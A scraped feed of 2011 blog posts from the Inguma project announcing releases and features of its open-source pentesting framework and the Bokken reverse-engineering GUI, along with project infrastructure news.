another major feature of Bokken 1.5 has been to remove the <i>"soon"</i> regarding the radare backend! And yes, we made it.</div><div><br /></div><div>Now Bokken can be used with all the power of radare and the ease of use of our GUI. Take a look at the <a href="http://radare.org/">radare</a> website to learn about the features of this powerful backend.</div><br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjU617xsQ33in4E9ZYtu2rUYUltQBiG0g-ger5k2TFOledV1-RMdWg-478jA1Kut3dfctym1wjK8uYheG3o0ygghLr-mqKKvJtGyMrWJyLKGmuair8tIOTeIEK4k0lmCH_dYHfturbiKTIU/s1600/bokke-new-gui-2.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 170px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjU617xsQ33in4E9ZYtu2rUYUltQBiG0g-ger5k2TFOledV1-RMdWg-478jA1Kut3dfctym1wjK8uYheG3o0ygghLr-mqKKvJtGyMrWJyLKGmuair8tIOTeIEK4k0lmCH_dYHfturbiKTIU/s320/bokke-new-gui-2.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5668196555459237986" /></a><br />Also almost all the views/tabs of Bokken have received some amount of love and have new features or improvements like:<br /><div><ul><li>The long-awaited <b>code navigation</b>.</li><li>Improved flowgraph view.</li><li>More<b> interactive hexdump</b>.</li><li>Many new features for working with URLs</li><li>New plugins like: (yes!) <b>bindiffing</b>, calculator, assembler, and more...</li></ul></div><div><div>And that's all for now. Complete and detailed information of all the new features will be shown in the <b>upcoming release</b> post.</div></div><div><br /></div><div>Don't forget to follow us on the project's <a href="http://twitter.com/ingumito">twitter</a> and send your ideas and comments to our mailing list:</div><div><br /></div><div><span class="Apple-style-span">bokken-devel (at) inguma.eu</span></div><div><br /></div><div>Stay tuned.</div>Enderhttp://www.blogger.com/profile/14709596788489094437noreply@blogger.com2tag:blogger.com,1999:blog-8320914018667085850.post-48673651410336333482011-09-14T20:11:00.000+02:002011-09-19T20:12:56.588+02:00Inguma 0.4 is out!<span class="Apple-style-span" style="font-family: 'Times New Roman'; font-size: medium;">Trying to follow a three months release cycle, today we are proud to announce the next version of the Inguma Project, in short Inguma v0.4. As always, let's see the new features we added this time:</span>
<ul>
<li style="font-family: 'Times New Roman'; font-size: medium;"><b>The GUI</b> has been modified and cleaned in order to give more space to the most active areas like the network map, the RCE interface or the exploits/fuzzing areas.</li>
<ul>
<li style="font-family: 'Times New Roman'; font-size: medium;">Last opened/saved KB are now easily accesible on the toolbar.</li>
<li style="font-family: 'Times New Roman'; font-size: medium;">A warning icon appears in the "Logs" tab when new content is available.</li>
<li style="font-family: 'Times New Roman'; font-size: medium;">The bottom status bar has gained more functionality showing information regarding KB in use and targets or vulnerabilities discovered.</li>
</ul>
</ul>
<div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqgA9AAxftS4waKFhvv6SUDy0wT-X5zJ5jMErn2WQiYYoC0k3AbqkCX2nrcr4CAjELerJnTxQ-dcamuXH5qgIQTUx7op-xAgrJ2RwkcPfMIQleCorW-oM6cerieUmn7WDGFAbAcgBD5Mtm/s1600/statusbar.png"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5651813797920641202" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqgA9AAxftS4waKFhvv6SUDy0wT-X5zJ5jMErn2WQiYYoC0k3AbqkCX2nrcr4CAjELerJnTxQ-dcamuXH5qgIQTUx7op-xAgrJ2RwkcPfMIQleCorW-oM6cerieUmn7WDGFAbAcgBD5Mtm/s320/statusbar.png" style="display: block; height: 30px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 255px;" /></a></div>
<ul>
<li style="font-family: 'Times New Roman'; font-size: medium;">We have <b>updated <a href="http://bokken.inguma.eu/">Bokken</a></b> subproject to the last stable version available, v1.0. It features an interactive mode, better code disassembly and analysis and better integration with Inguma's GUI. More information about Bokken can be found <a href="http://bokken.inguma.eu/projects/bokken/wiki/Wiki">here</a>.</li>
</ul>
<div style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLpvXab_jp_WW_Hl-UXHe7wklLrorptuq4d19_WCBHOOvy3W42n2ECiC0W2mSrvRGHjhN5kMDIvoZaHN0kbVjIuhzh_QhEZFUvM-1TnBNgdkFc_EZUhBeCEbFeisTWa31n876Zhqd2HvDa/s1600/bokken.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLpvXab_jp_WW_Hl-UXHe7wklLrorptuq4d19_WCBHOOvy3W42n2ECiC0W2mSrvRGHjhN5kMDIvoZaHN0kbVjIuhzh_QhEZFUvM-1TnBNgdkFc_EZUhBeCEbFeisTWa31n876Zhqd2HvDa/s320/bokken.png" width="320" /></a>
</div>
<ul>
<li style="font-family: 'Times New Roman'; font-size: medium;">The <b>systray</b> functionality allows now to hide the Inguma GUI while it's working and it will warn you once the running modules have finished.</li>
<li style="font-family: 'Times New Roman'; font-size: medium;">A <b>new fuzzing tab</b> has been added to the Exploits workspace with two different fuzzers: Krash and Scapy.</li>
</ul>
<ul><span class="Apple-style-span" style="-webkit-text-decorations-in-effect: underline;"><div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlfEvxeJ1dcuLhqKfJE3I6knpcullXiKwQuFo2YTQZ9MVdMF2F5gelWoXomOtapnu6gLlWx7DQ1btrvdH2a95STriu0UdgJQAmd0nbF3iUspKdDPah6Jnb0PcPKFC9P5Uwgv9-pPAhRfOl/s1600/fuzzing.png" imageanchor="1" style="color: #0000ee; font-family: Georgia, serif; margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlfEvxeJ1dcuLhqKfJE3I6knpcullXiKwQuFo2YTQZ9MVdMF2F5gelWoXomOtapnu6gLlWx7DQ1btrvdH2a95STriu0UdgJQAmd0nbF3iUspKdDPah6Jnb0PcPKFC9P5Uwgv9-pPAhRfOl/s320/fuzzing.png" width="320" /></a></div>
<div style="font-family: Georgia, serif; text-align: left;">
<br /></div>
</span><ul>
<li style="font-family: 'Times New Roman'; font-size: medium;"><b>Krash fuzzer</b> has been part of Inguma project for a while but now it can be used directly from the GUI. Just select the target, the packet to be fuzzed and press start. Read more about Krash fuzzer <a href="http://inguma.eu/projects/inguma/documents">here</a>.</li>
<li style="font-family: 'Times New Roman'; font-size: medium;">The <b>Scapy fuzzer</b> is a GUI wrapper to the scapy's fuzz function that makes network fuzzing very easy. It's fully drag-and-drop-driven and, in order to start, you just have to compose a packet by dropping layers, select the layers/fields to be fuzzed and select an output directory to save the sent and received packets.</li>
</ul>
</ul>
<div>
<span class="Apple-style-span"><span class="Apple-style-span" style="font-family: Georgia, serif; font-size: 16px;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdhu76ARiSrvQ7gnm0VCYj5D-vJ-mMJ0GpuH_ihsm0z4xAKlzfb9Wf94dfX1cgYi8UewIOrf56dYTy3QUDkVA0X9xUtwUvDpwXVTG2cVpNltKRhKhoYY2EL2A3W15JufibnJWphtVnhDp2/s1600/fuzz_menu.png"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5651813967768458258" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdhu76ARiSrvQ7gnm0VCYj5D-vJ-mMJ0GpuH_ihsm0z4xAKlzfb9Wf94dfX1cgYi8UewIOrf56dYTy3QUDkVA0X9xUtwUvDpwXVTG2cVpNltKRhKhoYY2EL2A3W15JufibnJWphtVnhDp2/s320/fuzz_menu.png" style="cursor: pointer; display: block; height: 215px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 260px;" /></a></span></span></div>
<ul>
<li style="font-family: 'Times New Roman'; font-size: medium;">The <b>CLI interface</b> has received some attention again and a few new shortcuts like '?' for help or '..' to go back to the main menu are now available in nearly all the modules.</li>
<ul>
<li style="font-family: 'Times New Roman'; font-size: medium;">Inguma CLI now works better on MacOS with autocompletion and key bindings.</li>
<li style="font-family: 'Times New Roman'; font-size: medium;">All the fuzzing modules are now under the fuzzers category and have been fixed.</li>
</ul>
</ul>
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">
Inguma v0.4
Copyright (c) 2006-2008 Joxean Koret <joxeankoret@yahoo.es></joxeankoret@yahoo.es>
Copyright (c) 2009-2011 Hugo Teso <hugo.teso@gmail.com></hugo.teso@gmail.com>
<br />
Type 'help' for a short usage guide.
inguma> nmapscan
inguma/nmapscan> ?
<br />
Inguma's Nmap Interface Help
------------------------------
<br />
help Show this help
nmaphelp Show Nmap's help
nmap <options> Execute Nmap with options specified</options>
exit Exit from nmapscan interface
<br />
inguma/nmapscan> ..
inguma> ..
Exit.
</span>
<ul>
<li style="font-family: 'Times New Roman'; font-size: medium;">Some additional minor changes include:</li>
<ul style="font-family: 'Times New Roman'; font-size: medium;">
<li>A new module to find subdomains is now available.</li>
<li>The option to automatically audit a new target has been added to the "New target" dialog.</li>
</ul>
<span class="Apple-style-span" style="-webkit-text-decorations-in-effect: underline;"><br /><span class="Apple-style-span"><span class="Apple-style-span" style="margin-left: auto; margin-right: auto;"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5651811398839857090" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPHSiTwyobIZ746fzBwxijaaIAHd4CxNdAeAuypaJwpf_0mHib1_Elx2nsPVdY46tgtxWN0ZQn8jUEb1l3dEKV7E4pgZk-8ucNso8449vpnwcv8X5B5K_HXj4-xLX8RMF3ygnlthtBO_Xz/s320/target_audit_host.png" style="cursor: pointer; display: block; height: 150px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 208px;" /></span></span></span><ul>
<li>Lots of code refactoring and bugs fixed.</li>
</ul>
</ul>
<div>
<span class="Apple-style-span"><b>Get the new release</b> <a href="http://inguma.eu/projects/inguma/files">here</a> while is hot, and stay tuned about the latest Inguma and Bokken developments at the project <a href="http://inguma.eu/projects/inguma/wiki/Contact">mailing lists</a> or the Twitter <a href="http://twitter.com/ingumito">profile</a>.</span></div>
htesohttp://www.blogger.com/profile/06933489709636162052noreply@blogger.com0tag:blogger.com,1999:blog-8320914018667085850.post-49973283022752171642011-08-16T03:41:00.000+02:002011-08-16T03:41:55.382+02:00Rooted CON Inguma video available.The <a href="http://www.rootedcon.es/">Rooted CON</a> media team have released the videos from the <a href="http://www.rootedcon.es/congreso/rootedforge.html">RootedForge event</a> that happened in Madrid on March, 3rd 2011. There Hugo Teso talked about the past, present and a bit of the future of the Inguma project. It's only in Spanish, sorry!<br />
<br />
<div style="text-align: center;"><iframe frameborder="0" height="300" src="http://player.vimeo.com/video/27582938?title=0&byline=0&portrait=0" width="400"></iframe></div><div style="text-align: center;"><a href="http://vimeo.com/27582938">RootedForge - Proyecto Inguma - Hugo Teso (Rooted CON 2011)</a> from <a href="http://vimeo.com/rootedcon">rootedcon</a> on <a href="http://vimeo.com/">Vimeo</a>.</div>Enderhttp://www.blogger.com/profile/14709596788489094437noreply@blogger.com0Madrid, España40.4166909 -3.7003454000000640.2509674 -3.88584290000006 40.5824144 -3.5148479000000603tag:blogger.com,1999:blog-8320914018667085850.post-37606413393925537602011-07-05T10:35:00.011+02:002011-08-15T05:09:54.081+02:00Bokken 1.0 has landed<div style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkyMsIiUyKzEA6VCy5FQzpRX0WkTXcl1pvqJDBICpIhL15s3Sd8vx3wETDVsRRHfNxKbk6XKbtJ_OV-EkUWuyoLHrf_HYOcy3hU6l274qhHU6PBhjABhHereIPTCZv3wpycl_eVUYCQJ0_/s1600/bokken_kanji_juntos_horizontal_300.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5625785402795512290" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkyMsIiUyKzEA6VCy5FQzpRX0WkTXcl1pvqJDBICpIhL15s3Sd8vx3wETDVsRRHfNxKbk6XKbtJ_OV-EkUWuyoLHrf_HYOcy3hU6l274qhHU6PBhjABhHereIPTCZv3wpycl_eVUYCQJ0_/s400/bokken_kanji_juntos_horizontal_300.png" style="cursor: hand; cursor: pointer; display: block; height: 135px; margin: 0px auto 10px; text-align: center; width: 300px;" /></a></div><div>Today we are releasing a new tool of the Inguma project: <b>Bokken</b>.</div><div><br />
</div><div>In <a href="http://ingumadev.blogspot.com/2011/05/welcome-to-inguma-version-03.html">Inguma 0.3</a>, an early version of Bokken was included as the RCE tool of the project.</div><br />
<div>Now we are giving it as a standalone tool.<br />
</div><br />
<div>Bokken is a GUI for the <a href="http://code.google.com/p/pyew/">Pyew</a> tool,<b> a *iew like tool for malware analysis</b>, so with Bokken you can do almost the same as with Pyew but with a nice GUI :-). Actually Bokken can parse and help in the analysis of <b>PE/Elf, PDF and websites</b>; any other file can be also opened and studied but Bokken won't analyze it.</div><div><br />
</div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbLwctRqe1Uyc6Hf36DHxtnkvMLULav-jXDFzS2au-_oNu7pAU62hKVbZ3Fds2hlWfSrReXUn0uIUwbmCis0XqWyatj__cTxEEOa1II5ymi8JkaW-wjq_VFPo_pL6jfLKKpk01O3guINkI/s1600/Bokken-1.0.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5625785851323379874" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbLwctRqe1Uyc6Hf36DHxtnkvMLULav-jXDFzS2au-_oNu7pAU62hKVbZ3Fds2hlWfSrReXUn0uIUwbmCis0XqWyatj__cTxEEOa1II5ymi8JkaW-wjq_VFPo_pL6jfLKKpk01O3guINkI/s320/Bokken-1.0.png" style="cursor: pointer; display: block; height: 170px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 320px;" /></a></div><div>To get a full description of the project features, installation instructions or just get the code go to the <a href="http://bokken.inguma.eu/">project site</a>.</div><div><br />
</div><div>Enjoy the new tool and don't forget to send us the <a href="http://bokken.inguma.eu/projects/bokken/issues/new">bugs</a> you find, <i>feature requests</i> or any other <a href="http://bokken.inguma.eu/projects/bokken/wiki/Contact">feedback</a> that you consider can help improve the project.</div>htesohttp://www.blogger.com/profile/06933489709636162052noreply@blogger.com0Madrid, España40.4166909 -3.7003454000000640.2509674 -3.88584290000006 40.5824144 -3.5148479000000603tag:blogger.com,1999:blog-8320914018667085850.post-46477942549343460722011-06-13T11:40:00.008+02:002011-07-05T19:49:34.175+02:00Welcome to Inguma version 0.3<div style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsUZwMyIXLlnul20R8WFRFmXt_oLtTptZqAh6O3Ek8pzuSGMS3SjlXks1eaMKbmjjH2yQOiZKAWlAYreY3k9cOsbt_Tt1qXnVKJnm93LCO7jHzLm-lOQ8sF9d5UXPGBZ2VIaL9kEaexo_i/s1600/top.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5615815089107193170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsUZwMyIXLlnul20R8WFRFmXt_oLtTptZqAh6O3Ek8pzuSGMS3SjlXks1eaMKbmjjH2yQOiZKAWlAYreY3k9cOsbt_Tt1qXnVKJnm93LCO7jHzLm-lOQ8sF9d5UXPGBZ2VIaL9kEaexo_i/s400/top.png" style="cursor: hand; cursor: pointer; display: block; height: 90px; margin: 0px auto 10px; text-align: center; width: 400px;" /></a></div><div style="text-align: left;">The Inguma team is very proud to release version 0.3 of their pentesting and vulnerability research framework. The new release increases stability (mainly the GUI) thanks to lots of bugs fixed, offers a smoother experience and, of course, includes some awesome features:</div><div><ul><li>Together with the new release we would like to introduce our project's new pet, Ingumito. He will keep all our users informed of the project news through his twitter account: <a href="http://twitter.com/Ingumito">@ingumito</a></li>
</ul><div><span class="Apple-style-span" style="-webkit-text-decorations-in-effect: underline; color: #0000ee;"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5616143946442966786" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZeA1ecgDc_Eb4N4XDC3nTe4UMCMPus4AI0lzTAn3SnAnER0IqpLDVZqKrcP7qJ-qR5XosfmqaXPIBiRVrS5VcoxgPvm2A4oMi5p7vft7AM9TDXNUP37biVRzSbyDbu7NpDLkrWnEHRXuQ/s400/Ingumito.png" style="cursor: pointer; display: block; height: 267px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 400px;" /></span></div><ul><li>A new module has been added to<b> map the IP addresses</b> using the GeoIP library from <a href="http://www.maxmind.com/">MaxMind</a>:</li>
</ul><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQ4elvsExyGrWvNuErfS9lHrgYaTvxmbNs3o2wXb9nUF8oYpKgjtQgOBVho2B_iGoyom3jptKlLSz46IAIyce6gbdMKsWp-HIgd0Sq1tzRQtnAsOmqFUENu4nvMyHphYIopQM7AMgCBdRr/s1600/GeoIP.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5615465577772237938" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQ4elvsExyGrWvNuErfS9lHrgYaTvxmbNs3o2wXb9nUF8oYpKgjtQgOBVho2B_iGoyom3jptKlLSz46IAIyce6gbdMKsWp-HIgd0Sq1tzRQtnAsOmqFUENu4nvMyHphYIopQM7AMgCBdRr/s320/GeoIP.png" style="cursor: pointer; display: block; height: 219px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 320px;" /></a></div><ul><li>By Ctrl + right clicking over a target a new menu entry will allow to <b>remove the target</b> and all its nodes from the map and the KB:</li>
</ul><div><span class="Apple-style-span" style="-webkit-text-decorations-in-effect: underline; color: #0000ee;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5Dar5hQPehD37-w4_wtoxed0TusPO2g276ouFYUHRQJFbYxX0exSBMRgNPZa0XjIdEEieCDp9-EYp44MOsm0fJIEk7yM86Bbh8WVTcnapbiGrOJXuw3eM_eLLM4Hc_dHJeGHxhy4BMn8v/s1600/Remove.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5615466405418476258" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5Dar5hQPehD37-w4_wtoxed0TusPO2g276ouFYUHRQJFbYxX0exSBMRgNPZa0XjIdEEieCDp9-EYp44MOsm0fJIEk7yM86Bbh8WVTcnapbiGrOJXuw3eM_eLLM4Hc_dHJeGHxhy4BMn8v/s320/Remove.png" style="cursor: pointer; display: block; height: 172px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 320px;" /></a></span></div><ul><li>Additional information regarding a vulnerability can be obtained by right clicking over a vulnerability node:</li>
</ul><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSPaX1b8xCqrNz-1zLYA8-DwWBWkA448iCu_GKtIOeZ5FeQ6gGA0GvkJ2u0ZLTltohO7b_s8UALnGJ6vl0_g5hLjN6yzy8TgkfHXWgYVmRnkperNuWpBGzQegbTSIpYYSYG1sRgmRHqwA0/s1600/web_vuln.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5615466867468291570" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSPaX1b8xCqrNz-1zLYA8-DwWBWkA448iCu_GKtIOeZ5FeQ6gGA0GvkJ2u0ZLTltohO7b_s8UALnGJ6vl0_g5hLjN6yzy8TgkfHXWgYVmRnkperNuWpBGzQegbTSIpYYSYG1sRgmRHqwA0/s320/web_vuln.png" style="cursor: pointer; display: block; height: 170px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 320px;" /></a></div><ul><li>The <i>Add Target</i> dialog must be improved to allow multiple IP addresses and other inputs but, meanwhile, the import dialog now supports a comma-separated CSV file to be used as <b>multiple IP input</b>.</li>
</ul><ul><li>The exploits download and load process has been simplified; download the exploits at the Preferences dialog and use the <i>Search</i> button to load the exploits. Once loaded, this button will search through the exploits DB.</li>
</ul><ul><li>The most important change of this new release is the <b>complete rewrite of the RCE interface and core.</b> OpenDis has been removed, and so the objdump dependency, and a new interface has been added that uses <a href="http://code.google.com/p/pyew/">Pyew</a> as backend:</li>
</ul><div><span class="Apple-style-span" style="-webkit-text-decorations-in-effect: underline; color: #0000ee;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlK0PYx_jz_fp0qT88OrW0_nat1rkAGJWXBAvB1iHTI8N8mBJK3b7QhaGkZNsjsq1PHk9Rob7lc5CDMBuDbsPUtY2k5oB-MXGI6iw_YaJawpM0EwrUSXMsBtWuhEnVdJBIWJlOlWTraIIN/s1600/bokken.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5615467774763247122" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlK0PYx_jz_fp0qT88OrW0_nat1rkAGJWXBAvB1iHTI8N8mBJK3b7QhaGkZNsjsq1PHk9Rob7lc5CDMBuDbsPUtY2k5oB-MXGI6iw_YaJawpM0EwrUSXMsBtWuhEnVdJBIWJlOlWTraIIN/s320/bokken.png" style="cursor: pointer; display: block; height: 170px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 320px;" /></a></span></div><div><span class="Apple-style-span"><br />
</span></div>This new interface offers most of the Pyew features in a easy-to-use GUI. Analyzing almost any kind of file or web site is now easier with this new release! This GUI for RCE is a new subproject of Inguma called Bokken and will be released soon in our website as an independent tool. Stay tuned!</div><div><br />
</div><div>The RCE interface will analyze PE, ELF, PDF and web sites, and will open any other file in the hex editor. An image is worth a thousand words, so here you have two thousand of them:<br />
<br />
</div><div><span class="Apple-style-span" style="-webkit-text-decorations-in-effect: underline; color: #0000ee;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirnrpvwdMtp0AHIkSheMmK7mRCJm_WEtWFIV3MiZsUNM3vdADfEeOK6OHC0fsV6VVK7f6gmtyfkVuMMBQlGKy9sFbgdFYGqdQtwsbGze8R1zFCKNXZDy93nsh6w2kQeAA9yoRFKVH6Hc9b/s1600/bokken_web.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5615468228014319682" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirnrpvwdMtp0AHIkSheMmK7mRCJm_WEtWFIV3MiZsUNM3vdADfEeOK6OHC0fsV6VVK7f6gmtyfkVuMMBQlGKy9sFbgdFYGqdQtwsbGze8R1zFCKNXZDy93nsh6w2kQeAA9yoRFKVH6Hc9b/s320/bokken_web.png" style="cursor: pointer; display: block; height: 170px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 320px;" /></a></span></div><div><div style="text-align: center;"><span class="Apple-style-span"><br />
</span></div><span class="Apple-style-span" style="-webkit-text-decorations-in-effect: underline; color: #0000ee;"></span><span class="Apple-style-span" style="-webkit-text-decorations-in-effect: underline; color: #0000ee;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlYUCOabYqa-LXe5VuBsWbgtPNxYRrVkynMossXo6pJNaLeWxIlm9Ks6jgQSkz02ryeqUKGWNcMbei9ItqEr7Yur9iV8-BqEATT_nQBPuZ2V47NxciEtranXBpa-kYqhCoeKuuxVLdlsWc/s1600/bokken_pdf.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5615468698980092450" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlYUCOabYqa-LXe5VuBsWbgtPNxYRrVkynMossXo6pJNaLeWxIlm9Ks6jgQSkz02ryeqUKGWNcMbei9ItqEr7Yur9iV8-BqEATT_nQBPuZ2V47NxciEtranXBpa-kYqhCoeKuuxVLdlsWc/s320/bokken_pdf.png" style="cursor: pointer; display: block; height: 170px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 320px;" /></a></span></div><div><span class="Apple-style-span"><br />
</span></div><div>Some minor features added are:</div><div><ul><li>An icon has been added to graph nodes to <b>show the OS of the target</b> when available.</li>
<li>New<b> autosave feature</b> that will save the KB after every module execution to prevent data loss in case of GUI crash. This autosaved KB will be loaded at startup if the user wants.</li>
<li><b>Single host report</b> option added to the node menu.</li>
<li><b>Improved performance</b> of ping and scan modules.</li>
<li>More modules have been ported to the GUI, like "identify"; wich has also been added to the list of modules launched on adding a target.</li>
<li>We are now<b> closer to full Windows compatibility</b> as this screenshot demonstrate :-)</li>
</ul><div><span class="Apple-style-span" style="-webkit-text-decorations-in-effect: underline; color: #0000ee;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinD4QGfHFL0iElHA097ImwFwYOh3ImqAYG3OGkGR6HulDsNd7c4DWeheqI7Js_qO5F4LUKG2U-W5ulhv4ZbHKla1aKc35m3gCrqoIj6tnBJsDPIcaJEKcdyfVj2e6GdMrfPLIkJfu4GLz8/s1600/GInguma-Win7.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5615470621999352034" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinD4QGfHFL0iElHA097ImwFwYOh3ImqAYG3OGkGR6HulDsNd7c4DWeheqI7Js_qO5F4LUKG2U-W5ulhv4ZbHKla1aKc35m3gCrqoIj6tnBJsDPIcaJEKcdyfVj2e6GdMrfPLIkJfu4GLz8/s320/GInguma-Win7.png" style="cursor: pointer; display: block; height: 147px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 320px;" /></a></span></div></div><br />
<div>We hope you enjoy using this new release as much as we enjoyed making it! Stay tuned of the project news with the <a href="http://twitter.com/Ingumito">Twitter</a> account or the <a href="http://inguma.eu/projects/inguma/wiki#Mailing-lists">mailing lists</a>. For more information, documentation, reporting bugs and, of course, download the release, visit the project's <a href="http://inguma.eu/">web site</a>.<br />
<br />
This release is dedicated to the hundreds of thousands of Spaniards that gathered on May 15th first in Madrid, then everywhere, to protest against political parties in the now-called #15M movement.</div>Enderhttp://www.blogger.com/profile/14709596788489094437noreply@blogger.com1tag:blogger.com,1999:blog-8320914018667085850.post-65269756393475677582011-05-09T21:21:00.001+02:002011-05-17T19:36:35.120+02:00Inguma server reachable over IPv6.I just added AAAA records to the zones for <a href="http://inguma.eu">inguma.eu</a> and inguma-framework.org! I don't think I broke anything, but just for you to know.Enderhttp://www.blogger.com/profile/14709596788489094437noreply@blogger.com0tag:blogger.com,1999:blog-8320914018667085850.post-65064607987857353702011-04-27T11:28:00.003+02:002011-07-05T19:50:23.552+02:00Mailing lists and more in place.Since the last post we have been busy, not only fixing bugs in Inguma but also adding some pieces of infrastructure to the project to improve the available facilities to develop Inguma.<br />
<ul><li>Two mailing lists are ready for use: <a href="http://inguma.eu/lists/listinfo/inguma-announce">inguma-announce</a> and <a href="http://inguma.eu/lists/listinfo/inguma-devel">inguma-devel</a>. Anyone familiar with OSS will infer their purpose.</li>
<li>Redmine has been upgraded to 1.1.2.</li>
<li>We are trying to import all the issues from the Google Code project into Redmine to avoid losing user reports. If you have any bug, report or suggestion, please create a Redmine account to add a new issue or contact our development list!</li>
<li>In the very near future we intend to publish updates also by Twitter to make people aware of our advancements. Keep tuned!</li>
</ul><br />
Also do not forget that we are available in #inguma on Freenode IRC network.Inguma Bloghttp://www.blogger.com/profile/11808896702980279168noreply@blogger.com0tag:blogger.com,1999:blog-8320914018667085850.post-45332057972251662312011-02-21T16:46:00.001+01:002011-05-19T06:06:18.019+02:00Inguma keeps moving...<div style="text-align: left;">First of all we would like to thank you the great welcome you have given to the new release; we will do our best to keep improving the project.</div><div><br />
</div><div>Since the 0.2 release many improvements have been done to Inguma and we will try to show you some of them on this post.</div><div><ul><li>Today we release a new project site and leave Google Code. The dev team has discussed a lot and finally decided to use our previous development site as the main one. You can find it at:</li>
</ul><div></div><blockquote><div><a href="http://www.inguma-framework.org/">http://www.inguma-framework.org</a></div><div><br />
</div><div>or, for the lazy ones (including ourselves), the shorter:</div><div><br />
</div><div><a href="http://www.inguma.eu/">http://www.inguma.eu</a></div></blockquote><div></div><ul><li>Lots of bugs have been fixed since 0.2 release and now Inguma should be fairly more stable, mainly the GUI.</li>
</ul><ul><li>As the GUI released at 0.2 had (and still has) many bugs and crashes quite <span class="hps" title="Click for alternate translations">frequently, we a</span>dded a new Autosave feature. It will save automatically the KB after every module run and try to recover it at every application start. Unless you manually save the KB or reject to load at start it will be available to recover your work.</li>
